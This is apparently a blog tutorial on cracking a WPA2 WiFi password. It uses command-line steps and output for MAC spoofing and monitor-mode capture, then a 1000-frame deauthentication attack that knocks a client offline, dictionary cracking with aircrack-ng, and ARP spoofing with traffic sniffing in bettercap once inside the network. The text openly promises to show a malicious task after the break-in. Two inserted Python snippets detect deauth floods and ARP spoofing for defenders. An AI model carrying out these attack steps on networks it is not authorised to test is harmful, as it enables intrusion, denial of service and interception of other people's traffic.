WIFI is used everywhere in the world in different areas of life: at home, at work and even in public places, for you to connect to the Internet and do business or personal matters. WiFi hacking attacks are also increasing every day.
Besides all of the advantages of making business and life easier, there are certain drawbacks in terms of risks. The insecurity of WiFi networks has been causing lots of problems in terms of breaking into banks, organizations and government agencies.
In this article, I will show how to hack a WIFI password ethically, and then how to perform a malicious task.
Wifi Hacking Tools needed:
- Debian Based Linux Operating System. Download: https://ubuntu.com/download/desktop
- Laptop with an external “Monitor Mode” supported WIFI adapter.
- aircrack-ng suite, install with the command “apt install aircrack-ng”
- MAC address changer. Download: https://github.com/alobbs/macchanger/archive/master.zip
Changing the Mac Address
Every network card has a physical static address that is assigned by the network card vendor. This static address is called the MAC (Media Access Control) address. The MAC address is used to identify other network-connected devices for communication purposes. It is better to change the MAC address before attacking the WiFi. We can change it using macchanger. Follow the commands below:
Get the interface:
$ ip addr show
Now change the MAC address:
$ ip link set wlp7s7 down
$ macchanger -m 00:01:ff:02:f7:10 wlp7s7
$ ip link set wlp7s7 up
Sniffing the wifi packet
The wireless card normally runs in normal mode, shown as “Managed” mode, which only handles the packets sent to us. But as a hacker, we need to capture packets for WiFi hacking, and “Managed” mode can’t capture them. To capture packets we need to change the mode to “Monitor”. Let’s see the current mode:
$ iwconfig
lo        no wireless extensions.
wlp7s7    IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=16 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
We can see the card is in “Managed” mode. We have to change it to “Monitor” mode:
$ airmon-ng start wlp7s7
Found 5 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
  PID Name
  772 avahi-daemon
  775 wpa_supplicant
  776 NetworkManager
  807 avahi-daemon
 1268 dhclient
PHY     Interface       Driver          Chipset
phy0    wlp7s7          ath9k           Qualcomm Atheros AR9287 Wireless Network Adapter (PCI-Express) (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlp7s7 on [phy0]wlp7s7mon)
                (mac80211 station mode vif disabled for [phy0]wlp7s7)
If we check the status of the card with the iwconfig command, it will show “Mode: Monitor” and the interface is now “wlp7s7mon”.
Capturing the packet and Hacking the Wifi password
Airodump-ng is a tool that is part of the Aircrack-ng suite. A packet sniffer lets us capture all the packets that are within range of the wireless card. We need to scan all WiFi networks.
To hack the target WiFi, we are now going to capture packets. First, we want to see how many APs (access points) are around us:
$ airodump-ng wlp7s7mon
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
BB:11:FF:28:AA:77  -46  7        0      0    5   270  WPA2  CCMP    PSK   Hack_Me
$ airodump-ng --bssid BB:11:FF:28:AA:77 --channel 8 --write Hack_Me.cap wlp7s7mon
Deauth a client
The problem is that we have to wait until a new client connects to the AP. For WiFi hacking this sometimes becomes tricky, because we don’t know when someone will connect. To make the job easier, we can deauthenticate every client/user. This attack will disconnect everyone from the access point even if it is password protected.
$ aireplay-ng --deauth 1000 -a BB:11:FF:28:AA:77 -c AA:AB:AC:DD:CC:EE wlp7s7mon
--deauth 1000 (send 1000 packets to take it down)
-a BB:11:FF:28:AA:77 (The access point)
-c AA:AB:AC:DD:CC:EE (Target wifi connected client)
This attack will disconnect the person from WiFi access for a while, and they will be connected back soon.
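On the network owner's side, the deauthentication burst described above stands out in a monitor-mode capture. The following Python code is an added example, not part of the original article: it assumes per-frame records exported as tab-separated fields (time, type/subtype, source, destination, BSSID), runs on constructed sample lines, and its window and threshold values are assumptions to tune for your own network.

```python
from collections import defaultdict, deque

DEAUTH = 0x0C  # 802.11 management frame subtype 12 (deauthentication)

def build_sample():
    """Constructed records: time, type/subtype, source, destination, BSSID."""
    ap, sta = "bb:11:ff:28:aa:77", "aa:ab:ac:dd:cc:ee"
    lines = [
        f"100.00\t0x0008\t{ap}\tff:ff:ff:ff:ff:ff\t{ap}",  # beacon
        f"101.00\t12\t{ap}\t11:22:33:44:55:66\t{ap}",      # one ordinary deauth
        "garbage line",                                     # malformed row
    ]
    # Burst: 40 deauth frames aimed at one client within two seconds.
    lines += [f"{200 + i * 0.05:.2f}\t0x000c\t{ap}\t{sta}\t{ap}" for i in range(40)]
    return lines

def find_deauth_floods(lines, window=5.0, threshold=20):
    """Return {(bssid, client): peak count} for every BSSID/client pair that
    receives at least `threshold` deauth frames within `window` seconds.
    Records are assumed to be in capture (time) order."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps inside window
    alerts = {}
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 5:
            continue              # skip malformed rows
        try:
            ts, subtype = float(parts[0]), int(parts[1], 0)  # "12" or "0x000c"
        except ValueError:
            continue
        if subtype != DEAUTH:
            continue
        # The source address is forgeable, so key on BSSID and destination.
        key = (parts[4].lower(), parts[3].lower())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

if __name__ == "__main__":
    for (bssid, client), n in find_deauth_floods(build_sample()).items():
        print(f"deauth flood: {n} frames in window, AP {bssid} -> client {client}")
```

Enabling Protected Management Frames (802.11w, mandatory in WPA3) on the access point and clients makes clients ignore forged deauthentication frames.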
Cracking the wifi password
Now just stop capturing (CTRL+C), because we are done. We just have to crack the password. We will see that several files have been created:
$ ls
Hack_Me.cap-01.cap  Hack_Me.cap-01.csv  Hack_Me.cap-01.kismet.csv  Hack_Me.cap-01.kismet.netxml  Hack_Me.cap-01.log.csv  w.txt
We only need the “Hack_Me.cap-01.cap” at this moment. I also have a wordlist file to make a dictionary attack. Okay, now let’s see if we can crack it 🙂 with a simple aircrack-ng command:
$ aircrack-ng Hack_Me.cap-01.cap -w w.txt
                              Aircrack-ng 1.5.2
      [00:00:00] 1/1 keys tested (31.30 k/s)
      Time left: 0 seconds                                     100.00%
                        KEY FOUND! [ Mr.Password ]
We just found the password. Now we will be able to connect to the WiFi. WiFi hacking is done. Now, what can we do with the hacked WIFI?
What can be done After hacking the WIFI Password?
After connecting to the AP we can discover all device addresses connected to this same network.
If we run the “arp -a” command, we will be able to see all connected IP and MAC addresses. We can also look up a MAC address to get manufacturer details.
We can also scan all the internal hosts with Nmap. Nmap will be able to discover all the filtered ports easily. For example, we can use bettercap to sniff traffic (Download: https://github.com/bettercap/bettercap).
$ ./bettercap
bettercap v2.26.1 (built for Linux amd64 with go1.11.6) [type 'help' for a list of commands]
192.168.1.0/24 > 192.168.1.4 » net.sniff on
192.168.1.0/24 > 192.168.1.4 » arp.spoof on
192.168.1.0/24 > 192.168.1.4 » [02:39:24] [net.sniff.dns] dns 22.214.171.124 > 192.168.1.12 : sub.domain.org is 126.96.36.199
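The same “arp -a” table lets a defender notice the spoofing shown above, because the spoofing host's MAC address ends up listed for the gateway's IP as well as its own. The following Python code is an added example, not part of the original article: it assumes the Linux net-tools output layout, the sample table and the known-good gateway MAC are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Matches "(IP) at MAC"; entries shown as <incomplete> do not match.
ARP_LINE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]{17})\b")

# Constructed `arp -a` output in which the gateway and host 192.168.1.4
# resolve to the same MAC address.
SAMPLE = """\
_gateway (192.168.1.1) at 00:01:ff:02:f7:10 [ether] on wlp7s7
? (192.168.1.4) at 00:01:ff:02:f7:10 [ether] on wlp7s7
? (192.168.1.12) at 3c:5a:b4:11:22:33 [ether] on wlp7s7
? (192.168.1.20) at <incomplete> on wlp7s7
"""

def parse_arp(text):
    """Map IP -> lower-case MAC, ignoring incomplete entries."""
    return {ip: mac.lower() for ip, mac in ARP_LINE.findall(text)}

def check_arp(text, gateway_ip, known_gateway_mac=None):
    """Return findings as (kind, mac, ips) tuples.
    'gateway-shared'  : the gateway's MAC is also claimed by another IP
    'shared'          : some other MAC answers for several IPs
    'gateway-changed' : gateway MAC differs from the recorded baseline"""
    table = parse_arp(text)
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    findings = []
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            # Multi-homed hosts and proxy ARP can share a MAC legitimately,
            # so the gateway case is reported separately as the strong signal.
            kind = "gateway-shared" if gateway_ip in ips else "shared"
            findings.append((kind, mac, sorted(ips)))
    gw = table.get(gateway_ip)
    if known_gateway_mac and gw and gw != known_gateway_mac.lower():
        findings.append(("gateway-changed", gw, [gateway_ip]))
    return findings

if __name__ == "__main__":
    # f4:f2:6d:aa:bb:cc is a constructed baseline value for the real router.
    for finding in check_arp(SAMPLE, "192.168.1.1", "f4:f2:6d:aa:bb:cc"):
        print(finding)
```

A static ARP entry for the gateway on important hosts, or Dynamic ARP Inspection on managed switches, keeps a spoofed reply from replacing the real mapping.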
We can do some more advanced attacks after connecting to the access point. Today I just showed you how a hacker can crack your WiFi password, and a simple example of what the hacker can do.